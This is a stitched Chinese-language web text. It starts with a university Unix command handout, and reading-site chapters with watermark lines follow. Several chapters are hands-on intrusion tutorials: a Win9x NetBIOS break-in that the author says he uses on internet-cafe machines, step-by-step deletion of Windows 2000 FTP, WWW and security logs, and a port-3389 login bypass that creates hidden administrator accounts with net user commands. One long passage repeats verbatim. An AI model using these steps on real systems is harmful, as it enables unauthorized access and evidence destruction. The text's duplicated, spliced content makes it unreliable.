  我们也可以用设定环境变数MANPATH的方式来取代-M选项。
  title这是所要查询的目的物。
  section为一个数字表示manual的分类,通常1代表可执行指令,
  2代表系统呼叫(systemcall),3代表标准函数,等等。
  我们如要参考eqnchar(7)的资料,则我们就输入man7eqnchar,
  便能取得我们所要的辅助讯息。
  -kkeyword
  用来将含有这项keyword的title列出来。
  man在UNIX上是一项非常重要的指令,我们在本讲义中所述之用法均仅只是一个大家比较常用的用法以及简单的说明,真正详细的用法与说明还是要请你使用man来得到。
  2.who
  who指令是用来查询目前有那些人在线上。
  3.w
  w指令是用来查询目前有那些人在线上,同时显示出那些人目前的工作。
  4.ku
  ku可以用来搜寻整个网路上的user,不像w跟who只是针对localhost的查询.而且ku提供让使用者建立搜寻特定使用者名单的功能。你可以建立一个档案information-file以条列的方式存放你的朋友的资料,再建立一个档案hosts-file来指定搜寻的机器名称。ku的指令格式可由ku-h得到。
  五.网路指令:
  UNIX提供网路的连接,使得你可以在各个不同的机器上做一些特殊的事情,如你可以在系上的iris图形工作站上做图形的处理,在系上的Sun上读News,甚至到学校的计中去找别系的同学talk。这些工作可以利用UNIX的网路指令,在你的位子上连到各个不同的机器上工作。如此一来,即使你在寝室,也能轻易的连至系上或计中来工作,不用像以前的人必须泡在冷冰冰的机房面。
  这些网路的指令如下所述:
  1.rlogin与rsh
  rlogin的意义是remotelogin
  也就是经由网路到另外一部机器login。
  rlogin的格式是:
  rloginhost[-lusername]
  选项-lusername是当你在远方的机器上的username和localhost不同的时後,必须输入的选项,否则rlogin将会假设你在那边的username与localhost相同,然後在第一次login时必然会发生错误。
  rsh是在远方的机器上执行某些指令,而把结果传回localhost。rsh的格式
  如下:
  rshhost[-lusername][command]
  如同rlogin的参数-lusername
  rsh的-lusername也是指定remotehost的username。而command则是要在remotehost上执行的指令。如果没有指定command,则rsh会去执行rlogin,如同直接执行rlogin。
  不过rsh在执行的时候并不会像一般的login程序一样还会问你password
  而是如果你没有设定trusttable
  则remotehost将不会接受你的request。
  rsh须要在每个可能会做为remotehost的机器上设定一个档案,称为.rhosts。这个档案每一行分为两个部份,第一个是允许login的hostname
  第二个部份则是允许login的username。例如,在ccsun7.csie.nctu.edu.tw上头你的username为QiangGe
  而你的home下面的.rhost有以下的一行:
  ccsun6.cc.nctu.edu.twu8217529
  则在ccsun6.cc.nctu.edu.tw机器上的useru8217529就可以用以下的方法来执行rsh程式:
  %rshccsun7.csie.nctu.edu.tw-lysjuangcatmbox
  将ysjuang在ccsun7.csie.nctu.edu.tw上的mbox档案内容显示在localhostccsun6.cc.nctu.edu.tw上。
  而如果.rhost有这样的一行,则ccsun6.cc.nctu.edu.tw上的useru8217529
  将可以不用输入password而直接经由rsh或rloginlogin到
  ccsun7.csie.nctu.edu.tw来。
  注意:
  .rhost是一个设定可以信任的人login的表格,因此如果设定不当将会让不法之徒有可以乘机侵入系统的机会。如果你阅读man5rhosts,将会发现你可以在第一栏用+来取代任何hostname,第二栏用+来取代任何username。
  如一般user喜欢偷懒利用"+username"来代替列一长串hostname,但是这样将会使得即使有一台PC上跑UNIX的user有与你相同的username
  也可以得到你的trust而侵入你的系统。这样容易造成系统安全上的危险。因此本系禁止使用这样子的方式写你的.rhost档,如果
  发现将予以停机直到你找中心的工作人员将其改正为止。同理,如果你的第二个栏位为+,如"hostname+"
  则你是允许在某一部机器上的"所有"user可以不用经由输入password来进入你的帐号,是壹种更危险的行为。所以请自行小心。
  2.telnet
  telnet是一个提供user经由网路连到remotehost。
  telnet的格式如下:
  telnet[hostname|ip-address][port]
  hostname为一个像ccsun1或是ccsun1.cc.nctu.edu.tw的nameaddress,ip-address则为一个由四个小於255的数字组成的ipaddress,如ccsun1的ip-address为140.113.17.173,ccsun1.cc.nctu.edu.tw的ip-address为140.113.4.11。你可以利用telnetccsun1或telnet140.113.17.173来连到ccsun1。
  port为一些特殊的程式所提供给外界的沟通点,如资工系的MUD其server便提供一些port让user由这些port进入MUD程式。详情请参阅telnet(1)的说明。
  3.ftp
  ftp的意义是FileTransferProgram,是一个很常应用在网路档案传输的
  程式。ftp的格式如下:
  ftp[hostname|ip-address]
  其中hostname|ip-address的意义跟telnet中的相同。
  在进入ftp之後,如果与remotehost连接上了,它将会询问你username与密码,如果输入对了就可以开始进行档案传输。
  在ftp中有许多的命令,详细的使用方式请参考ftp(1),这里仅列出较常用的cd
  lcd
  mkdir
  put
  mput
  get
  mget
  binary
  ascii
  prompt
  help与quit的使用方式。
  ascii将传输模式设为ascii模式。通常用於传送文字档。
  binary将传输模式设为binary模式,通常用於传送执行档,压缩档与影像档等。
  cdremote-directory将remotehost上的工作目录改变。
  lcd[directory]更改localhost的工作目录。
  ls[remote-directory][local-file]列出remotehost上的档案。
  getremote-file[local-file]取得远方的档案。
  mgetremote-files可使用通用字元一次取得多个档案。
  putlocal-file[remote-file]将localhost的档案送到remotehost。
  mputlocal-files可使用通用字元一次将多个档案放到remotehost上。
  help[command]线上辅助指令。
  mkdirdirectory-name在remotehost造一个目录。
  prompt更改交谈模式,若为on则在mput与mget时每作一个档案之传输时均会询问。
  quit/bye离开ftp.
  利用ftp,我们便可以在不同的机器上将所需要的资料做转移,某些特别的机器更存放大量的资料以供各地的使用者抓取,本校较著名的ftpserver有NCTUCCCA与系上的ftp.csie.nctu.edu.tw。这些ftpserver均有提供一个user称为anonymous,一般的"外来客"可以利用这个username取得该server的公共资料。不过anonymous在询问password时是要求使用anonymous的使用者输入其emailaddress,以往有许多台湾的使用者在使用国外的ftpserver时并没有按照人家的要求输入其emailaddress,而仅是随便打一些字串,引起许多internetuser和管理者的不满,对台湾的使用者的风评变得很差,因此遵循各ftpserver的使用规则也是一件相当重要的事。
  六.关於通讯用的指令:
  1.write
  这个指令是提供使用者传送讯息给另一个使用者,使用方式:
  writeusername[tty]
  2.talk/ytalk/cytalk/ctalk
  UNIX专用的交谈程式。会将萤幕分隔开为你的区域和交谈对象的区域,同时也可和不同机器的使用者交谈。使用方式:
  talkusername[@host][tty]
  3.mesg
  选择是否接受他人的messege
  若为messegeno则他人的messege将无法传送给你,同时他也无法干扰你的工作。使用方法:
  mesg[-n|-y]
  4.mail/elm
  在网路上的email程式,可经由此程式将信件mail给他人。使用方式:
  mail[username]
  mail-fmailboxfile
  如有信件,则直接键入mail可以读取你的mail.
  elm提供较mail更为方便的介面,而且可做线上的alias.你可以进入elm
  使用上下左右键来选读取的信件,并可按h取得线上的help文件。
  使用方式:
  elm[usernmae]
  elm-fmailboxfile
  七.编译器(Compiler):
  Compiler的用处在於将你所撰写的程式翻译成一个可执行档案。在资工系常用的程式语言是C
  pascal
  FORTRAN等。你可以先写好一个C或Pascal或FORTRAN的原始程式档,再用这些compiler将其翻成可执行档。你可以用这个方法来制造你自己的特殊指令。
  1.cc/gcc(CCompiler)
  /usr/bin/cc
  /usr/local/bin/gcc
  语法:cc[-oexecfile]source
  gcc[-oexecfile]source
  execfile是你所希望的执行档的名称,如果没有加上-o选项编译出来的可执行档会以a.out做为档名。source为一个以.c做为结尾的C程式档。请参阅cc(1)的说明。
  2.pc(PascalCompiler)
  /usr/local/bin/pc
  语法:pc[-oexecfile]source
  execfile是你所希望的执行档的名称,如果没有加上-o选项编译出来的可执行档会以a.out做为档名。source为一个以.p做为结尾的Pascal程式档。请参阅/net/home5/lang/man中pc(1)的说明。
  3.f77(FortranCompiler)
  /net/home5/lang/f77
  语法:f77[-oexecfile]source
  execfile是你所希望的执行档的名称,如果没有加上-o选项编译出来的可执行档会以a.out做为档名。source为一个以.p做为结尾的FORTRAN程式档。
  八.有关列印的指令:
  以下为印表所会用到的指令,在本系的印表机有lp1
  lp2(点矩阵印表机),
  lw
  sp
  ps
  compaq(雷射印表机),供使用者使用。
  1.lpr
  lpr为用来将一个档案印至列表机的指令。
  用法:
  lpr-P[printer]file1file2file3....
  或
  lpr-P[printer]
  例子:
  lpr-Plp1hello.chello.lsthello.map
  lpr-Plp1
  前者以参数输入所要印出的档案内容,後者列印标准输入档案(standardinput)的内容,因已将hello.c转向到标准输入,故会印出hello.c的档案内容。
  2.lpq
  lpq是用来观察printerqueue上的Jobs。
  用法:
  lpq-P[printer]
  3.lprm
  lprm是用来取消列印要求的指令。通常我们有时会印错,或是误送非文字档资料至printer
  此时就必须利用lprm取消列印request,以免造成资源的浪费。
  用法:
  lprm-P[printer][Jobsid|username]
  lprm用来清除printerqueue中的Jobs
  如果你使用JobId作为参数,则它将此Job自printerqueue清除,如果你用username作为参数,则它将此queue中所有Owner为此username的Jobs清除。
  九.更改个人使用资料:
  1.passwd
  passwd是用来更改你的使用密码,用法为:
  passwd[username]
  在使用passwd的时候,它会先问你的旧密码,然後询问两次要更改的密码,确定无误後才将你的密码改掉。
  2.chsh
  chsh是提供使用者更换loginshell的指令,你可经由此更换自己使用的shell。
  返
滺優書萌 uUTxT.cOM 全文自扳越读


第二卷 第一十章 字数:620
  ?现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法:
  1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。
  2.判断对方上网的地点,开个DOS窗口键入TRACERTXX.XX.XX.XX
  第4和第5行反映的信息既是对方的上网地点。
  3.得到对方电脑的名称,开个DOS窗口键入NBTSTAT-AXX.XX.XX.XX
  第一行是对方电脑名称
  第二行是对方电脑所在工作组
  第三行是对方电脑的说明
  4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件:
  XX.XX.XX.XX电脑名
  5.开DOS窗口键入NBTSTAT-
  6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。次法很用的,我经常跑到人家网吧的主机上去COPY文件,很实用的
  以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。
  对付上面进攻的最好办法就是隐藏你的IP地址。当然你也可以关掉139端口,但是那样的话,你就不能开共享了,如果你是网吧,显然是不行的,如果你是个人用户,最好是关掉这个139(方法我下次补上,大家请注意查看另外我有个爆炸性的文件,谁想要就加我QQ啊122670265)
悠U书萌 UUTXt。COM 荃纹子板阅读


第二卷 第一十一章 字数:7905
  ?Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同。当我们用流光探测时,比如说IPC探测,就会在安全日志里迅速地记下流光探测时所用的用户名、时间等等,用FTP探测后,也会立刻在FTP日志中记下IP、时间、探测所用的用户名和密码等等。甚至连流影启动时需要msvcp60.dll这个动库链接库,如果服务器没有这个文件都会在日志里记录下来,这就是为什么不要拿国内主机探测的原因了,他们记下你的IP后会很容易地找到你,只要他想找你!!还有Scheduler日志这也是个重要的LOG,你应该知道经常使用的srv.exe就是通过这个服务来启动的,其记录着所有由Scheduler服务启动的所有行为,如服务的启动和停止。
  日志文件默认位置:
  应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\system32\config,默认文件大小512KB,管理员都会改变这个默认大小。
  安全日志文件:%systemroot%\system32\config\SecEvent.EVT
  系统日志文件:%systemroot%\system32\config\SysEvent.EVT
  应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
  Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个日志
  Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志
  Scheduler服务日志默认位置:%systemroot%\schedlgu.txt
  以上日志在注册表里的键:
  应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:
  HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
  有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。
  Schedluler服务日志在注册表中
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
  FTP和WWW日志详解:
  FTP日志和WWW日志默认情况,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日产生的日志,用记事本就可直接打开,如下例:
  #Software:MicrosoftInternetInformationServices5.0(微软IIS5.0)
  #Version:1.0(版本1.0)
  #Date:200010230315(服务启动时间日期)
  #Fields:timecipcsmethodcsuristemscstatus
  0315127.0.0.1[1]USERadministator331(IP地址为127.0.0.1用户名为administator试图登录)
  0318127.0.0.1[1]PASS–530(登录失败)
  032:04127.0.0.1[1]USERnt331(IP地址为127.0.0.1用户名为nt的用户试图登录)
  032:06127.0.0.1[1]PASS–530(登录失败)
  032:09127.0.0.1[1]USERcyz331(IP地址为127.0.0.1用户名为cyz的用户试图登录)
  0322127.0.0.1[1]PASS–530(登录失败)
  0322127.0.0.1[1]USERadministrator331(IP地址为127.0.0.1用户名为administrator试图登录)
  0324127.0.0.1[1]PASS–230(登录成功)
  0321127.0.0.1[1]MKDnt550(新建目录失败)
  0325127.0.0.1[1]QUIT–550(退出FTP程序)
  从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了四次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名,如上例入侵者最终是用administrator用户名进入的,那么就要考虑更换此用户名的密码,或者重命名administrator用户。
  WWW日志
  WWW服务同FTP服务一样,产生的日志也是在%systemroot%\system32\LogFiles\W3SVC1目录下,默认是每天一个日志文件,下面是一个典型的WWW日志文件
  #Software:MicrosoftInternetInformationServices5.0
  #Version:1.0
  #Date:2000102303:091
  #Fields:datetimecipcsusernamesipsportcsmethodcsuristemcsuriqueryscstatuscs(UserAgent)
  2000102303:091192.168.1.26192.168.1.3780GET/iisstart.asp200Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
  2000102303:094192.168.1.26192.168.1.3780GET/pagerror.gif200Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
  通过分析第六行,可以看出2000年10月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp
  这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。
  既使你删掉FTP和WWW日志,但是还是会在系统日志和安全日志里记录下来,但是较好的是只显示了你的机器名,并没有你的IP,例如上面几个探测之后,系统日志
  将会产生下面的记录:
  一眼就能看出2000年10月23日,16点17分,系统因为某些事件出现警告,双击头一个,打开它的属性:
  属性里记录了出现警告的原因,是因为有人试图用administator用户名登录,出现一个错误,来源是FTP服务。
  同时安全记录里写将同时记下:(Ekin:此图不是此次示例的安全日志)
  在上图中可以看到两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败,日期为2000年10月18日,时间为1002,这就需要重点观察。
  双点第一个失败审核事件的,即得到此事件的详细描述,如下图12所示:
  分析上图,我们可以得知有个CYZ的工作站,用administator用户名登录本机,但是因为用户名未知或密码错误(实际为密码错误)未能成功。
  另外还有DNS服务器日志,不太重要,就此略过(其实是我没有看过它)
  知道了Windows2000日志的详细情况,下面就要学会怎样删除这些日志:
  通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除,而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。
  首先要取得Admnistrator密码或Administrators组成员之一,然后Telnet到远程主机,先来试着删除FTP日志:
  D:\SERVER>delschedlgu.txt
  D:\SERVER\SchedLgU.Txt
  进程无法访问文件,因为另一个程序正在使用此文件。
  说过了,后台有服务保护,先把服务停掉!
  D:\SERVER>netstop"taskscheduler"
  下面的服务依赖于TaskScheduler服务。
  停止TaskScheduler服务也会停止这些服务。
  RemoteStorageEngine
  是否继续此操作?(Y/N)[N]:y
  RemoteStorageEngine服务正在停止....
  RemoteStorageEngine服务已成功停止。
  TaskScheduler服务正在停止.
  TaskScheduler服务已成功停止。
  OK,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下!
  D:\SERVER>delschedlgu.txt
  D:\SERVER>
  没有反应?成功了!下一个是FTP日志和WWW日志,原理都是一样,先停掉相关服务,然后再删日志!
  D:\SERVER\system32\LogFiles\MSFTPSVC1>delex*.log
  D:\SERVER\system32\LogFiles\MSFTPSVC1>
  以上操作成功删除FTP日志!再来WWW日志!
  D:\SERVER\system32\LogFiles\W3SVC1>delex*.log
  D:\SERVER\system32\LogFiles\W3SVC1>
  OK!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是EventLog,试着停掉它!
  D:\SERVER\system32\LogFiles\W3SVC1>netstopeventlog
  这项服务无法接受请求的"暂停"或"停止"操作。
  KAO,I服了U,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用Win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它如下图所示:
  输入远程计算机的IP,然后点支烟,等上数十分钟,忍受象死机的折磨,然后打开下图:
  选择远程计算机的安全性日志,右键选择它的属性:
  点击属性里的“清除日志”按钮,OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志!
  目前在不借助第三工具的情况下,能很快,很顺利地清除FTP、WWW还有Schedlgu日志,就是系统日志和安全日志属于Windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了Windows2000的日志文件以及删除方法,但是你必须是Administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于Windows2000Professional计算机,也适用于作为独立服务器或成员服务器运行的Windows2000Server计算机。
  至此,Windows2000安全知识基础讲座完毕,还有几句话要讲,大家也看出来了,虽然FTP等等日志可以很快清除,但是系统日志和安全日志却不是那么快、那么顺利地能删除,如果遇到聪明的管理员,将日志文件转移到另一个地方,那更是难上加难,所以奉劝大家,千万不要拿国内的主机做试验,国内的法律很严呀!今天吃饭时,听说有两个人开玩笑,一个人把另外一个人的东西藏起来了,结果那个人一急,报案了,于是藏东西那个人被判四年刑!!法官说法律是不开玩笑的!!!所以大家一定要牢记这点!(不要说我老生常谈)
  如果大家有什么不明白地方,请在光和影子论坛提问!谢谢!
  在上图中可以看到两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败,日期为2000年10月18日,时间为1002,这就需要重点观察。
  双点第一个失败审核事件的,即得到此事件的详细描述,如下图12所示:
  分析上图,我们可以得知有个CYZ的工作站,用administator用户名登录本机,但是因为用户名未知或密码错误(实际为密码错误)未能成功。
  另外还有DNS服务器日志,不太重要,就此略过(其实是我没有看过它)
  知道了Windows2000日志的详细情况,下面就要学会怎样删除这些日志:
  通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除,而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。
  首先要取得Admnistrator密码或Administrators组成员之一,然后Telnet到远程主机,先来试着删除FTP日志:
  D:\SERVER>delschedlgu.txt
  D:\SERVER\SchedLgU.Txt
  进程无法访问文件,因为另一个程序正在使用此文件。
  说过了,后台有服务保护,先把服务停掉!
  D:\SERVER>netstop"taskscheduler"
  下面的服务依赖于TaskScheduler服务。
  停止TaskScheduler服务也会停止这些服务。
  RemoteStorageEngine
  是否继续此操作?(Y/N)[N]:y
  RemoteStorageEngine服务正在停止....
  RemoteStorageEngine服务已成功停止。
  TaskScheduler服务正在停止.
  TaskScheduler服务已成功停止。
  OK,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下!
  D:\SERVER>delschedlgu.txt
  D:\SERVER>
  没有反应?成功了!下一个是FTP日志和WWW日志,原理都是一样,先停掉相关服务,然后再删日志!
  D:\SERVER\system32\LogFiles\MSFTPSVC1>delex*.log
  D:\SERVER\system32\LogFiles\MSFTPSVC1>
  以上操作成功删除FTP日志!再来WWW日志!
  D:\SERVER\system32\LogFiles\W3SVC1>delex*.log
  D:\SERVER\system32\LogFiles\W3SVC1>
  OK!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是EventLog,试着停掉它!
  D:\SERVER\system32\LogFiles\W3SVC1>netstopeventlog
  这项服务无法接受请求的"暂停"或"停止"操作。
  KAO,I服了U,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用Win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它如下图所示:
  输入远程计算机的IP,然后点支烟,等上数十分钟,忍受象死机的折磨,然后打开下图:
  选择远程计算机的安全性日志,右键选择它的属性:
  点击属性里的“清除日志”按钮,OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志!
  目前在不借助第三工具的情况下,能很快,很顺利地清除FTP、WWW还有Schedlgu日志,就是系统日志和安全日志属于Windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了Windows2000的日志文件以及删除方法,但是你必须是Administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于Windows2000Professional计算机,也适用于作为独立服务器或成员服务器运行的Windows2000Server计算机。
幽滺书萌 UuTXT.cOm 诠汶自坂粤渎


第二卷 第一十二章 字数:1536
  ?这是一种入侵简单,但造成用户损失后果最严重的一种入侵方法,严禁入侵国内主机!请慎用之!!!
  (使用系统:WIN98/ME/2000/NT)这个方法对简体WIN2000有效。所以练习可以,但不要破坏。如果懂NET和IPC管道入侵的学者更容易学。
  一准备工具:WIN2000终端服务客户端程序,SQLEXEC程序,SUPERSCAN扫描器。
  二我们先运行SUPERSCAN扫描器,扫描器设置如图:
  SUPERSCAN设置
  注意:主要是改二个地方:一个IP地址,另一个端口改成3389.
  三我们扫出有3389端口打开的主机后,用SQLEXEC程序看看能不能创建新用户。如果不能创建就放弃,(当然还有另一种方法,下面再说。)如果我们能用NETUSER创建用户,并把用户加到ADMINISTRATORS组的话,那恭喜你。准备登陆。
  四我们打开WIN2000客户端程序。在最上面一项填入对方的IP。其他项不用改。按连接。过几秒后客户程序会打开一个窗口:
  五这个画面相信你很熟悉了吧,在使用者名称填入你刚才创建的用户名,密码栏填入你创建的密码然后按确定。呵呵,等一会(具体时间要看网速)就登陆到对方机器的窗口了。如图
  登陆成功窗口
  六你可以看到对方主机的所有内容了,(怎么感觉有点象冰河?呵,冰河也没有这么直观呀)等于你强占了对方的机器,它的生杀大权就都在你手里了。可别干坏事啊。呵呵。进去后记住要删除入侵记录。把c:winnt\system32\logfiles\*.*文件删除。别删错了呀。
  上面的方法优点在于可以直接输入用户名和密码就能登陆,缺点是要用SQLEXEC一个一个试。还有一种方法:此方法适合于熟练掌握NET命令的学员。
  我们用SUPERSCAN先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入“c:\winnt\system32”。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。现在我们要获得一个账号,成为系统的合法用户。在该目录下找到net.exe”,为net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入user用户名密码/add”,创建一个新账号,运行该快捷方式,此时你不会看到运行状态,但新用户已被激活。然后又修改该快捷方式,填入localgroupadministrators新用户/add,将新用户变成系统管理员。大家可以用SQL和IPC管道命令进入了。
  好了,三种经常用到的入侵方法已经和大家简单的说了。大家可以参考练习。万万不可破坏国内主机。要不会受到法律的严惩。如果还有问题请到论坛问
UU书盟 UUTXt.coM 诠汶子坂粤牍


第二卷 第一十三章 字数:4268
  ?Alerter(警报器服务):局域网中当系统发生问题时向系统管理员发出警报,对普通用户可设置为“已禁用”或“手动”。
  ApplicationManagement(应用程序管理):Win2K引入了一种基于msi文件格式(应用程序安装信息程序包文件)的全新、有效软件管理方案——应用程序管理组件服务,它不仅管理软件的安装、删除,而且可以使用此项服务修改、修复现有应用程序,监视文件复原并通过复原排除基本故障等。虽然如此,当设置为“已禁用”时似乎并不影响单机上软件的安装与卸载,而且基于msi格式安装、修复与删除的行为亦正常。
  ClipBook(剪贴簿):通过NetworkDDE和NetworkDDEDSDM提供的网络动态数据交换服务,查阅远程机器中的剪贴簿。对普通用户可设置为“已禁用”。
  ComputerBrowser(计算机浏览器):维护网上邻居中计算机的最新列表,并将这个列表通知给请求的程序。普通用户设置为:“已禁用”,局域网用户设为:“自动”。
  DHCPClient(动态主机配置协议客户端):DHCP是一种提供动态IP地址分配、管理的TCP/IP服务协议,作为网络启动过程的一部分,DHCP客户端系统就可以向DHCP服务器请求和租用IP地址。作为普通用户,如果已通过拨号方式连入Internet,那么还是保持自动状态为好,因为我们在Internet上的IP地址是由ISP动态分配的。如果系统不应用于任何网络,那么您可以将其设为“已禁用”。
  DistributedLinkTrackingClient(分布式连接跟踪客户端):DLTC能跟踪文件在网络域的NTFS卷中移动状况,并发出通知。普通用户设置为:“已禁用”,局域网用户(硬盘已格式为NTFS)设为:“自动”。
  DNSClient(域名系统客户端):将域名解析为IP地址。除非您没有连入任何网络,否则应设为“自动”。
  EventLog(事件日志):该服务能记录程序和系统发送的出错消息。虽然日志包含了对诊断问题有所帮助的信息,但对普通用户可能起不了什么作用,那就设为“手动”吧!还记得前面提到的Dr.Watson工具吗?在那里我们无法决定是否取消掉记录日志文件,在默认情况下它总是自动执行,现在您可以取舍了。不过,在测试中我禁用了这个服务重启系统后,却导致了几个关于网络的服务无法启动的现象,使我们无法拨号上网。因此如果您存在Internet或局域网连接,我们建议还是不要禁用为妥。
  FaxService(传真服务):在Win95中支持的传真功能现在在Win2K中重新被予以支持,而且与系统集成得更好。如果用不上它,就设为“已禁用”吧!
  IndexingService(索引服务):索引服务能针对本地硬盘或共享网络驱动器上的文档内容和属性建立索引,并通过Win2K特有的文档过滤器快速定位到您所需要的文档上,它大大强化了Win2K的搜索能力。一方面索引搜索又消耗了大量系统资源。微软建议:仅有64MB内存,而要索引的文档又超过十万个,就应该禁用这个服务。事实上,在我们针对64MB内存系统的测试中,即使文档数量远远低于十万个,系统资源的消耗亦非常惊人,而在128MB的系统上情况也好不了多少,因此我们强烈建议禁用它。
  InternetConnectionSharing(Internet连接共享):为局域网计算机提供Internet共享连接。这个服务为多台联网的电脑共享一个拨号网络访问Internet提供了捷径,以前在Win9X中要实现这一功能需借助SYGATE、WinGATE等代理软件,现在这一功能已直接被Win2K支持了。对普通用户可将其设为“已禁用”。
  IPSECPolicyAgent(IP安全策略代理):该代理服务允许IP安全策略对两台计算机之间传输的数据包进行加密,从而防止在网上看到它的人对它进行更改和破译。IPSEC是一种用来保护内部网、专用网络以及外部网(Internet、Extranet)免遭攻击的重要防御方法。使用IPSEC前必须需要首先定义两台计算机之间相互信任和通信安全的方式。请注意:在Win2K默认情况下“IP安全策略代理”是自动启动的,而“IP安全策略”并没有启动(我们可以在“网络和拨号连接”→“您的拨号连接属性”→“网络”页→“Internet协议(TCP/IP)”属性→“高级”→“选项”页下的“IP安全机制”属性中看到)。既然如此,一般用户就完全可以禁用这个代理服务了。
  Messenger(信使服务):发送和接收由系统管理员或由Alerter服务所发送消息的服务。由于Alerter服务需要依找本服务,因此如果已将Alerter禁止,那么这项可以设置为“手动”或“已禁用”。
  NetLogon(网络登陆):简单说就是在局域网上验证登录信息的选项。一般用户可以将其设为“已禁用”或“手动”。
  NetMeetingRemoteDesktopSharing(NetMeeting远程桌面共享):该服务能通过NetMeeting允许有权用户远程访问Windows桌面。这个功能对一般用处不大,可以设为“已禁用”。NetworkConnections(网络连接):它管理着“网络和拨号连接”文件夹中的所有对象。如果您有任何网络连接(包括Internet拨号连接)就保持“手动”状态。否则若您禁用它,在“网络和拨号连接”就保持“手动”状态。否则若您禁用它,在“网络和拨号连接”文件夹中将什么都看不到,更不用说新建连接和拨号上网了,不信您试试看。
  NetworkDDE(网络动态数据交换)和NetworkDDEDSDM:网络动态数据交换服务是一种为DDE对话提供网络传输和安全的服务。DDE(动态数据交换)是实现进程通讯的一种形式,它允许支持DDE的两个或多个程序交换信息和命令。对一般用户可设为“已禁用”。
  PlugandPlay(即插即用):即插即用是INTEL开发的一组规范,它赋予了计算机自动检测和配置设备并安装相应驱动程序的能力,当有设备被更改时能自动通知使用该设备的程序当前设备的状况。将该服务状态保持“自动”有利于设备的管理和维护。
  PrintSpooler(打印后台处理):该服务的作用是将多个请求打印的文档统一进行保存和管理,待打印机空闲后,再将数据送往打印机处理。无任何打印设备的用户设置为“已禁用”,否则设为“自动”。请注意:如果您启用了传真服务(FaxService)的话,就应该保持自动状态,因为传真服务依赖PrintSpooler的运行。
